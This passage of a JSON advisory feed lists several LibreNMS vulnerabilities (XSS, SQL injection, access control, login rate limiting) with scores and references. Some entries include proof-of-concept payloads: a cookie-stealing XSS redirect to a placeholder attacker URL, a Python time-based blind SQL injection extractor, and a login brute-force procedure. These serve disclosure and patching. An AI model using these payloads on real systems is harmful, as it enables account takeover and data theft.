session.\n","origin":"UNSPECIFIED","severity":"LOW","published_at":"2024-10-01T20:31:09.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":1.9,"cvss_vector":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:P","references":["https://github.com/librenms/librenms/security/advisories/GHSA-gcgp-q2jq-fw52","https://github.com/librenms/librenms/commit/f259edc19b9f0ccca484c60b1ba70a0bfff97ef5","https://github.com/librenms/librenms/blob/0e741e365aa974a74aee6b43d1b4b759158a5c7e/includes/html/forms/alert-templates.inc.php#L40","https://github.com/librenms/librenms/blob/0e741e365aa974a74aee6b43d1b4b759158a5c7e/includes/html/modal/alert_template.inc.php#L205","https://nvd.nist.gov/vuln/detail/CVE-2024-47526","https://github.com/advisories/GHSA-gcgp-q2jq-fw52"],"source_kind":"github","identifiers":["GHSA-gcgp-q2jq-fw52","CVE-2024-47526"],"repository_url":"https://github.com/librenms/librenms","blast_radius":0.5719569917615642,"created_at":"2024-10-01T21:06:14.821Z","updated_at":"2026-09-03T00:07:07.392Z","epss_percentage":0.00454,"epss_percentile":0.37517,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1nY2dwLXEyanEtZnc1Ms4AA_5z","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS1nY2dwLXEyanEtZnc1Ms4AA_5z","packages":[{"ecosystem":"packagist","package_name":"librenms/librenms","versions":[{"first_patched_version":"24.9.0","vulnerable_version_range":"\u003c 24.9.0"}],"purl":null}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1nY2dwLXEyanEtZnc1Ms4AA_5z/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS1yd3djLTJ2OHEtZ2M5ds4AA_5y","url":"https://github.com/advisories/GHSA-rwwc-2v8q-gc9v","title":"LibreNMS has Stored Cross-site Scripting vulnerability in \"Device Dependencies\" feature","description":"### Summary\nA Stored Cross-Site Scripting (XSS) vulnerability in the \"Device Dependencies\" feature allows authenticated users to inject arbitrary JavaScript through the device name (\"hostname\" parameter). This vulnerability can lead to the execution of malicious code in the context of other users' sessions, potentially compromising their accounts and allowing unauthorized actions.\n\n### Details\nThe vulnerability occurs when creating a device within LibreNMS. An attacker can inject arbitrary JavaScript into the hostname parameter. This malicious script is then executed when another user visits the device dependencies page, resulting in an automatic redirect to a website controlled by the attacker. This redirect can be used to steal session cookies or perform other malicious actions.\n\nFor example, the following payload can be used to exploit the vulnerability:\n```t'' autofocus onfocus=\"document.location='https://\u003cattacker_url\u003e/?c='+document.cookie\"```\n\nWhen the device dependencies page is loaded, this payload triggers the JavaScript, causing the user's browser to redirect to the attacker's website with any non-httponly cookies in the URL.\n\nThe root cause of this vulnerability is the application's failure to sanitize the row.hostname value before including it in the HTML output. \n\nThis is evident in the following line of code:\nhttps://github.com/librenms/librenms/blob/9455173edce6971777cf6666d540eeeaf6201920/includes/html/pages/device-dependencies.inc.php#L74\n\n### PoC\n1. Add a new device using the following payload for the hostname:\n```t'' autofocus onfocus=\"document.location='https://\u003cattacker_url\u003e/?c='+document.cookie\"```\n2. Save the device.\n3. Navigate to the device dependencies page.\n4. Observe that the injected script executes, redirecting the user to the attacker's website with any non-httponly cookies included in the URL.\n\nExample Request:\n```http\nPOST /addhost HTTP/1.1\nHost: \u003cyour_host\u003e\nX-Requested-With: XMLHttpRequest\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nCookie: \u003cyour_cookie\u003e\n\n_token=\u003cyour_token\u003e\u0026hostname=t%27%27+autofocus+onfocus%3D%22document.location%3D%27https%3A%2F%\u003cattacker_url\u003e%2F%3Fc%3D%27%2Bdocument.cookie%22\u0026sysName=\u0026hardware=\u0026os=\u0026os_id=\u0026snmpver=v2c\u0026port=\u0026transport=udp\u0026port_assoc_mode=ifIndex\u0026community=\u0026authlevel=noAuthNoPriv\u0026authname=\u0026authpass=\u0026authalgo=SHA\u0026cryptopass=\u0026cryptoalgo=AES\u0026force_add=on\u0026Submit=\n```\n\n### Impact\nIt could allow authenticated users to execute arbitrary JavaScript code in the context of other users' sessions. Impacted users could have their accounts compromised, enabling the attacker to perform unauthorized actions on their behalf.\n","origin":"UNSPECIFIED","severity":"MODERATE","published_at":"2024-10-01T20:31:04.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":5.0,"cvss_vector":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:P/VC:N/VI:N/VA:N/SC:H/SI:L/SA:L/E:P","references":["https://github.com/librenms/librenms/security/advisories/GHSA-rwwc-2v8q-gc9v","https://github.com/librenms/librenms/commit/36b38a50cc10d4ed16caab92bdc18ed6abac9685","https://github.com/librenms/librenms/blob/9455173edce6971777cf6666d540eeeaf6201920/includes/html/pages/device-dependencies.inc.php#L74","https://nvd.nist.gov/vuln/detail/CVE-2024-47527","https://github.com/advisories/GHSA-rwwc-2v8q-gc9v"],"source_kind":"github","identifiers":["GHSA-rwwc-2v8q-gc9v","CVE-2024-47527"],"repository_url":"https://github.com/librenms/librenms","blast_radius":1.505149978319906,"created_at":"2024-10-01T21:06:14.841Z","updated_at":"2026-09-03T00:07:07.392Z","epss_percentage":0.00497,"epss_percentile":0.405,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1yd3djLTJ2OHEtZ2M5ds4AA_5y","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS1yd3djLTJ2OHEtZ2M5ds4AA_5y","packages":[{"ecosystem":"packagist","package_name":"librenms/librenms","versions":[{"first_patched_version":"24.9.0","vulnerable_version_range":"\u003c 24.9.0"}],"purl":null}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1yd3djLTJ2OHEtZ2M5ds4AA_5y/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS1qaDU3LWozdnEtaDQzOM4AA7PQ","url":"https://github.com/advisories/GHSA-jh57-j3vq-h438","title":"LibreNMS vulnerable to a Time-Based Blind SQL injection leads to database extraction","description":"### Summary\nGet a valid API token, make sure you can access api functions, then replace string on my PoC code, Test on offical OVA image, it's a old version 23.9.1, but this vulerable is also exists on latest version 24.2.0\n\n### Details\nin file `api_functions.php`, line 307 for function list_devices\n\n```php\n$order = $request-\u003eget('order');\n    $type = $request-\u003eget('type');\n    $query = $request-\u003eget('query');\n    $param = [];\n\n    if (empty($order)) {\n        $order = 'hostname';\n    }\n\n    if (stristr($order, ' desc') === false \u0026\u0026 stristr($order, ' asc') === false) {\n        $order = 'd.`' . $order . '` ASC';\n    }\n    /* ... */\n    $devices = [];\n    $dev_query = \"SELECT $select FROM `devices` AS d $join WHERE $sql GROUP BY d.`hostname` ORDER BY $order\";\n    foreach (dbFetchRows($dev_query, $param) as $device) {\n```\nThe \"order\" parameter is obtained from $request. After performing a string check, the value is directly incorporated into an SQL statement and concatenated, resulting in a SQL injection vulnerability.\n\n### PoC\nFor example. this PoC is get current db user\n```python\nimport string\nimport requests\n\nheaders = {\n\t'X-Auth-Token': 'token_string'\n}\nreq = requests.Session()\npayloads = '_-@.,' + string.digits + string.ascii_letters\nurl = 'http://host/api/v0/devices?order=device_id` and if(ascii(substr(user(),%d,1))=%d,sleep(5),1) and d.`device_id'\nresult = 'user: '\nfor i in range(10):\n\tfor payload in payloads:\n\t\ttry:\n\t\t\treq.get(url % (i+1, ord(payload)), headers=headers, timeout=3)\n\t\texcept requests.exceptions.ReadTimeout as ex:\n\t\t\tresult += payload\n\t\t\tprint(result),\n\t\texcept Exception as e:\n\t\t\tpass\n```\n![QQ截图20240306181404](https://github.com/librenms/librenms/assets/11938870/017cc413-ce1e-45a2-b0f1-a0ae83bbbeee)\n\n### Impact\nAttacker can extract whole database","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2024-04-22T18:37:35.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":7.2,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H","references":["https://github.com/librenms/librenms/security/advisories/GHSA-jh57-j3vq-h438","https://github.com/librenms/librenms/commit/83fe4b10c440d69a47fe2f8616e290ba2bd3a27c","https://nvd.nist.gov/vuln/detail/CVE-2024-32480","https://github.com/advisories/GHSA-jh57-j3vq-h438"],"source_kind":"github","identifiers":["GHSA-jh57-j3vq-h438","CVE-2024-32480"],"repository_url":"https://github.com/librenms/librenms","blast_radius":0.0,"created_at":"2024-04-22T19:04:55.606Z","updated_at":"2026-09-03T00:08:40.190Z","epss_percentage":0.2028,"epss_percentile":0.97147,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1qaDU3LWozdnEtaDQzOM4AA7PQ","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS1qaDU3LWozdnEtaDQzOM4AA7PQ","packages":[{"ecosystem":"packagist","package_name":"librenms/librenms","versions":[{"first_patched_version":"24.4.0","vulnerable_version_range":"\u003c 24.4.0"}],"purl":null}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1qaDU3LWozdnEtaDQzOM4AA7PQ/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS03Mm05LTdjOHgtcG1td84AA7PP","url":"https://github.com/advisories/GHSA-72m9-7c8x-pmmw","title":"LibreNMS uses Improper Sanitization on Service template name leads to Stored XSS","description":"### Summary\nThere is improper sanitization on Service template name which is reflecting in delete button onclick event. This value can be modified and crafted as any other javascript code.\n\n \n### Vulnerable Code\nhttps://github.com/librenms/librenms/blob/a61c11db7e8ef6a437ab55741658be2be7d14d34/app/Http/Controllers/ServiceTemplateController.php#L67C23-L67C23\n\nAbove is vulnerable code line which needs to be properly sanitized \n\n### PoC\n1. Go to /services/templates\n2. Enter name as `testing', '14', 'http://172.105.62.194:8000/services/templates/14');alert(1);//`\n3. Submit it and try to delete it, you will see popup\n\nIf you inspect element on delete button, you will notice this:-\n\u003cimg width=\"748\" alt=\"Screenshot 2023-11-23 at 9 30 24 PM\" src=\"https://user-images.githubusercontent.com/31764504/285260018-7672a93d-e29b-4444-8057-e6ffcb8dabfc.png\"\u003e\n\n\n### Impact\nCross site scripting can lead to cookie stealing or an attacker can execute any other feature using this feature.\n","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2024-04-22T18:37:27.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":7.1,"cvss_vector":"CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H","references":["https://github.com/librenms/librenms/security/advisories/GHSA-72m9-7c8x-pmmw","https://github.com/librenms/librenms/commit/19344f0584d4d6d4526fdf331adc60530e3f685b","https://github.com/librenms/librenms/blob/a61c11db7e8ef6a437ab55741658be2be7d14d34/app/Http/Controllers/ServiceTemplateController.php#L67C23-L67C23","https://nvd.nist.gov/vuln/detail/CVE-2024-32479","https://github.com/advisories/GHSA-72m9-7c8x-pmmw"],"source_kind":"github","identifiers":["GHSA-72m9-7c8x-pmmw","CVE-2024-32479"],"repository_url":"https://github.com/librenms/librenms","blast_radius":0.0,"created_at":"2024-04-22T19:04:55.640Z","updated_at":"2026-09-03T00:08:40.190Z","epss_percentage":0.34127999999999997,"epss_percentile":0.98191,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS03Mm05LTdjOHgtcG1td84AA7PP","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS03Mm05LTdjOHgtcG1td84AA7PP","packages":[{"ecosystem":"packagist","package_name":"librenms/librenms","versions":[{"first_patched_version":"24.4.0","vulnerable_version_range":"\u003c 24.4.0"}],"purl":null}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS03Mm05LTdjOHgtcG1td84AA7PP/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS1jd3g2LWN4N3gtNHEzNM4AA7PO","url":"https://github.com/advisories/GHSA-cwx6-cx7x-4q34","title":"LibreNMS vulnerable to SQL injection time-based leads to database extraction","description":"### Summary\nSQL injection vulnerability in POST /search/search=packages in LibreNMS 24.3.0 allows a user with global read privileges to execute SQL commands via the package parameter. \n\n### Details\nThere is a lack of hygiene of data coming from the user in line 83 of the file librenms/includes/html/pages/search/packages.inc.php\n![vulnerability](https://github.com/librenms/librenms/assets/58785171/3ad76f72-e62b-475e-84a0-4024e751f44c)\n\n### PoC\nhttps://doc.clickup.com/9013166444/p/h/8ckm0bc-53/16811991bb5fff6\n\n### Impact\nWith this vulnerability, we can exploit a SQL injection time based vulnerability to extract all data from the database, such as administrator credentials\n","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2024-04-22T18:37:21.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":8.8,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H","references":["https://github.com/librenms/librenms/security/advisories/GHSA-cwx6-cx7x-4q34","https://github.com/librenms/librenms/commit/d29201fce134347f891102699fbde7070debee33","https://doc.clickup.com/9013166444/p/h/8ckm0bc-53/16811991bb5fff6","https://nvd.nist.gov/vuln/detail/CVE-2024-32461","https://github.com/advisories/GHSA-cwx6-cx7x-4q34"],"source_kind":"github","identifiers":["GHSA-cwx6-cx7x-4q34","CVE-2024-32461"],"repository_url":"https://github.com/librenms/librenms","blast_radius":0.0,"created_at":"2024-04-22T19:04:55.668Z","updated_at":"2026-09-03T00:08:40.191Z","epss_percentage":0.19107,"epss_percentile":0.96962,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1jd3g2LWN4N3gtNHEzNM4AA7PO","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS1jd3g2LWN4N3gtNHEzNM4AA7PO","packages":[{"ecosystem":"packagist","package_name":"librenms/librenms","versions":[{"first_patched_version":"24.4.0","vulnerable_version_range":"\u003c 24.4.0"}],"purl":null}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1jd3g2LWN4N3gtNHEzNM4AA7PO/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS1mcHE1LTR2d20tNzh4NM4AA3P3","url":"https://github.com/advisories/GHSA-fpq5-4vwm-78x4","title":"LibreNMS has Broken Access control on Graphs Feature","description":"### Summary\nThis vulnerability occurs when application is not checking access of each type of users as per their role and it autorizing the users to access any feature. When user access his Device dashboard in librenms, one request is going to graph.php to access image of graphs generated on the particular Device. This request can be accessed by lower privileged users as well and they can enumerate devices on librenms with their id or hostname.\n\n### Details\n_Give all details on the vulnerability. Pointing to the incriminated source code is very helpful for the maintainer._\n\n### PoC\n1. Login with Lower privilege user\n2. Go to /graph.php?width=150\u0026height=45\u0026device=1\u0026type=device_ping_perf\u0026from=1699022192\u0026legend=no\u0026bg=FFFFFF00\u0026popup_title=ICMP+Response\n3. If its showing image with \"device*ping_perf\" which confirms that there is device with id 1\n4. Now you can change device parameter in above URL with hostname to check if that Hostname/IP exist or not like\nhttp://127.0.0.1:8000/graph.php?width=150\u0026height=45\u0026device=127.0.0.1\u0026type=device_ping_perf\u0026from=1699022192\u0026legend=no\u0026bg=FFFFFF00\u0026popup_title=ICMP+Response\n\n5. If device hostname doesn't exist then it should show 500 error\n\nCheck attached screenshots for more info\n\nVulnerable code:\nhttps://github.com/librenms/librenms/blob/fa93034edd40c130c2ff00667ca2498d84be6e69/html/graph.php#L19C1-L25C2\n\nAbove is vulnerable line of code from Line number 19-25\nThis is not checking privilege of users to access any device hostname, its just checking if user is authenticated \nor not\n\n\n### Impact\nLow privilege users can see all devices registered by admin users by using this method\n\n### Solution\nImplement privilege access control feature to check if low privilege user have access or not.\n\n### Screenshots:-\n\u003cimg width=\"967\" alt=\"Screenshot 2023-11-04 at 8 31 15 PM\" src=\"https://user-images.githubusercontent.com/31764504/281085588-1c5d81b9-83d7-4ba8-baf3-03c95a99cefe.png\"\u003e\n\u003cimg width=\"973\" alt=\"Screenshot 2023-11-04 at 8 31 36 PM\" src=\"https://user-images.githubusercontent.com/31764504/281085614-7a4d13b0-d316-4d24-bdd2-05c3a80ffd59.png\"\u003e\n\u003cimg width=\"955\" alt=\"Screenshot 2023-11-04 at 8 31 48 PM\" src=\"https://user-images.githubusercontent.com/31764504/281085629-43aa2b6f-7b18-415f-8001-519bda45f918.png\"\u003e\n\n","origin":"UNSPECIFIED","severity":"MODERATE","published_at":"2023-11-17T21:51:57.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":4.3,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N","references":["https://github.com/librenms/librenms/security/advisories/GHSA-fpq5-4vwm-78x4","https://github.com/librenms/librenms/commit/489978a923ed52aa243d3419889ca298a8a6a7cf","https://github.com/librenms/librenms/blob/fa93034edd40c130c2ff00667ca2498d84be6e69/html/graph.php#L19C1-L25C2","https://nvd.nist.gov/vuln/detail/CVE-2023-48294","https://github.com/advisories/GHSA-fpq5-4vwm-78x4"],"source_kind":"github","identifiers":["GHSA-fpq5-4vwm-78x4","CVE-2023-48294"],"repository_url":"https://github.com/librenms/librenms","blast_radius":0.0,"created_at":"2023-11-17T22:05:59.669Z","updated_at":"2026-09-03T00:10:07.539Z","epss_percentage":0.00695,"epss_percentile":0.49537,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1mcHE1LTR2d20tNzh4NM4AA3P3","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS1mcHE1LTR2d20tNzh4NM4AA3P3","packages":[{"ecosystem":"packagist","package_name":"librenms/librenms","versions":[{"first_patched_version":"23.11.0","vulnerable_version_range":"\u003c 23.11.0"}],"purl":null}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1mcHE1LTR2d20tNzh4NM4AA3P3/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS04cGhyLTYzN2ctcHhyZ84AA3P2","url":"https://github.com/advisories/GHSA-8phr-637g-pxrg","title":"LibreNMS Cross-site Scripting at Device groups Deletion feature","description":"### Summary\nXSS attacks occurs when application is not sanitising inputs properly and rendering the code from user input to browser which could allow an attacker to execute malicious javascript code.\n\n### PoC\n1. Login\n2. Create a device group in /device-groups\n3. Name it as `\"\u003e\u003cimg src=x onerror=alert(1);\u003e`\n4. save it\n5. Go to services and create a service template and add that device group into that and save it\n6. After that go back to device groups and delete that device, you will see XSS payload popup in message\n\u003cimg width=\"1043\" alt=\"Screenshot 2023-11-08 at 9 15 56 PM\" src=\"https://user-images.githubusercontent.com/31764504/281489434-9beaebd6-b9ce-4098-a8e0-d67b185062b5.png\"\u003e\n\n\n### Vulnerable code:\nhttps://github.com/librenms/librenms/blob/63eeeb71722237d1461a37bb6da99fda25e02c91/app/Http/Controllers/DeviceGroupController.php#L173C21-L173C21\n\nLine 173 is not sanitizing device name properly\n\u003cimg width=\"793\" alt=\"Screenshot 2023-11-08 at 9 26 14 PM\" src=\"https://user-images.githubusercontent.com/31764504/281490570-5ae6e73a-37ce-4683-8bc8-81655abd8d09.png\"\u003e\n\n### Impact\nCross site scripting can lead to cookie stealing attacks","origin":"UNSPECIFIED","severity":"MODERATE","published_at":"2023-11-17T21:51:24.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":6.3,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:L/A:N","references":["https://github.com/librenms/librenms/security/advisories/GHSA-8phr-637g-pxrg","https://nvd.nist.gov/vuln/detail/CVE-2023-48295","https://github.com/librenms/librenms/commit/faf66035ea1f4c1c4f34559b9d0ed40ee4a19f90","https://github.com/librenms/librenms/blob/63eeeb71722237d1461a37bb6da99fda25e02c91/app/Http/Controllers/DeviceGroupController.php#L173C21-L173C21","https://github.com/advisories/GHSA-8phr-637g-pxrg"],"source_kind":"github","identifiers":["GHSA-8phr-637g-pxrg","CVE-2023-48295"],"repository_url":"https://github.com/librenms/librenms","blast_radius":0.0,"created_at":"2023-11-17T22:05:59.698Z","updated_at":"2026-09-03T00:10:07.539Z","epss_percentage":0.00562,"epss_percentile":0.44504,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS04cGhyLTYzN2ctcHhyZ84AA3P2","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS04cGhyLTYzN2ctcHhyZ84AA3P2","packages":[{"ecosystem":"packagist","package_name":"librenms/librenms","versions":[{"first_patched_version":"23.11.0","vulnerable_version_range":"\u003c 23.11.0"}],"purl":null}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS04cGhyLTYzN2ctcHhyZ84AA3P2/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS1ycTQyLTU4cWYtdjNxeM4AA3Pz","url":"https://github.com/advisories/GHSA-rq42-58qf-v3qx","title":"LibreNMS vulnerable to rate limiting bypass on login page","description":"### Summary\nApplication is using two login methods and one of them is using GET request for authentication. There is no rate limiting security feature at GET request or backend is not validating that. \n\n### PoC\nGo to /?username=admin\u0026password=password\u0026submit=\nCapture request in Burpsuite intruder and add payload marker at password parameter value.\nStart the attack after adding your password list\nWe have added 74 passwords\nCheck screenshot for more info\n\u003cimg width=\"1241\" alt=\"Screenshot 2023-11-06 at 8 55 19 PM\" src=\"https://user-images.githubusercontent.com/31764504/280905148-42274f1e-f869-4145-95b4-71c0bffde3a0.png\"\u003e\n\n### Impact\nAn attacker can Bruteforce user accounts and using GET request for authentication is not recommended because certain web servers logs all requests in old logs which can also store victim user credentials.","origin":"UNSPECIFIED","severity":"MODERATE","published_at":"2023-11-17T21:38:42.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":5.3,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N","references":["https://github.com/librenms/librenms/security/advisories/GHSA-rq42-58qf-v3qx","https://github.com/librenms/librenms/pull/15558","https://github.com/librenms/librenms/commit/7c006e96251ae1d32e1a015b361a7bfbb815c028","https://github.com/librenms/librenms/releases/tag/23.11.0","https://nvd.nist.gov/vuln/detail/CVE-2023-46745","https://github.com/advisories/GHSA-rq42-58qf-v3qx"],"source_kind":"github","identifiers":["GHSA-rq42-58qf-v3qx","CVE-2023-46745"],"repository_url":"https://github.com/librenms/librenms","blast_radius":0.0,"created_at":"2023-11-17T22:05:59.774Z","updated_at":"2026-09-03T00:10:07.541Z","epss_percentage":0.00599,"epss_percentile":0.45593,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1ycTQyLTU4cWYtdjNxeM4AA3Pz","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS1ycTQyLTU4cWYtdjNxeM4AA3Pz","packages":[{"ecosystem":"packagist","package_name":"librenms/librenms","versions":[{"first_patched_version":"23.11.0","vulnerable_version_range":"\u003c 23.11.0"}],"purl":null}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1ycTQyLTU4cWYtdjNxeM4AA3Pz/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS1tcjZoLTd4Mm0tcmdtcc4AA2dG","url":"https://github.com/advisories/GHSA-mr6h-7x2m-rgmq","title":"SQL injection in librenms/librenms","description":" SQL Injection in GitHub repository librenms/librenms prior to 23.10.0.","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2023-10-16T03:30:30.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":7.8,"cvss_vector":"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H","references":["https://nvd.nist.gov/vuln/detail/CVE-2023-5591","https://github.com/librenms/librenms/commit/908aef65967ce6184bdc587fd105660d5d55129e","https://huntr.dev/bounties/54813d42-5b93-440e-b9b1-c179d2cbf090","https://github.com/advisories/GHSA-mr6h-7x2m-rgmq"],"source_kind":"github","identifiers":["GHSA-mr6h-7x2m-rgmq","CVE-2023-5591"],"repository_url":"https://github.com/librenms/librenms","blast_radius":0.0,"created_at":"2023-10-17T15:06:36.839Z","updated_at":"2026-09-03T00:10:27.616Z","epss_percentage":0.22222,"epss_percentile":0.97558,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1tcjZoLTd4Mm0tcmdtcc4AA2dG","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS1tcjZoLTd4Mm0tcmdtcc4AA2dG","packages":[{"ecosystem":"packagist","package_name":"librenms/librenms","versions":[{"first_patched_version":"23.10.0","vulnerable_version_range":"\u003c 23.10.0"}],"purl":null}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1tcjZoLTd4Mm0tcmdtcc4AA2dG/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS0ycThjLWdxZjQtbWczds4AA17s","url":"https://github.com/advisories/GHSA-2q8c-gqf4-mg3v","title":"Cross site scripting in librenms","description":"Cross-site Scripting (XSS) - DOM in GitHub repository librenms/librenms prior to 23.9.1.","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2023-09-19T03:30:34.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":8.4,"cvss_vector":"CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:H/A:H","references":["https://nvd.nist.gov/vuln/detail/CVE-2023-5060","https://github.com/librenms/librenms/commit/8fd8d9b06a11060de5dc69588a1a83594a7e6f72","https://huntr.dev/bounties/01b0917d-f92f-4903-9eca-bcfc46e847e3","https://github.com/advisories/GHSA-2q8c-gqf4-mg3v"],"source_kind":"github","identifiers":["GHSA-2q8c-gqf4-mg3v","CVE-2023-5060"],"repository_url":"https://github.com/librenms/librenms","blast_radius":0.0,"created_at":"2023-09-21T18:05:56.581Z","updated_at":"2026-09-03T00:10:45.116Z","epss_percentage":0.00561,"epss_percentile":0.43539,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS0ycThjLWdxZjQtbWczds4AA17s","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS0ycThjLWdxZjQtbWczds4AA17s","packages":[{"ecosystem":"packagist","package_name":"librenms/librenms","versions":[{"first_patched_version":"23.9.1","vulnerable_version_range":"\u003c 23.9.1"}],"purl":null}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS0ycThjLWdxZjQtbWczds4AA17s/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS01amptLXFwNDgtcXA4Ns4AA144","url":"https://github.com/advisories/GHSA-5jjm-qp48-qp86","title":"LibreNMS Cross-site Scripting vulnerability","description":"Cross-site Scripting (XSS) - DOM in GitHub repository librenms/librenms prior to 23.9.0.","origin":"UNSPECIFIED","severity":"MODERATE","published_at":"2023-09-15T03:30:19.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":5.4,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N","references":["https://nvd.nist.gov/vuln/detail/CVE-2023-4981","https://github.com/librenms/librenms/commit/03c4da62c8acde0a82acbb4a445ae866ebfdd3f7","https://huntr.dev/bounties/1f014494-49a9-4bf0-8d43-a675498b9609","https://github.com/advisories/GHSA-5jjm-qp48-qp86"],"source_kind":"github","identifiers":["GHSA-5jjm-qp48-qp86","CVE-2023-4981"],"repository_url":"https://github.com/librenms/librenms","blast_radius":0.0,"created_at":"2023-09-15T20:05:54.837Z","updated_at":"2026-09-03T00:10:48.237Z","epss_percentage":0.00565,"epss_percentile":0.44623,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS01amptLXFwNDgtcXA4Ns4AA144","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS01amptLXFwNDgtcXA4Ns4AA144","packages":[{"ecosystem":"packagist","package_name":"librenms/librenms","versions":[{"first_patched_version":"23.9.0","vulnerable_version_range":"\u003c 23.9.0"}],"purl":null}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS01amptLXFwNDgtcXA4Ns4AA144/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS1xeHJxLTM3NnEtcDM5aM4AA14y","url":"https://github.com/advisories/GHSA-qxrq-376q-p39h","title":"LibreNMS Cross-site Scripting vulnerability","description":"Cross-site Scripting (XSS) - Generic in GitHub repository librenms/librenms prior to 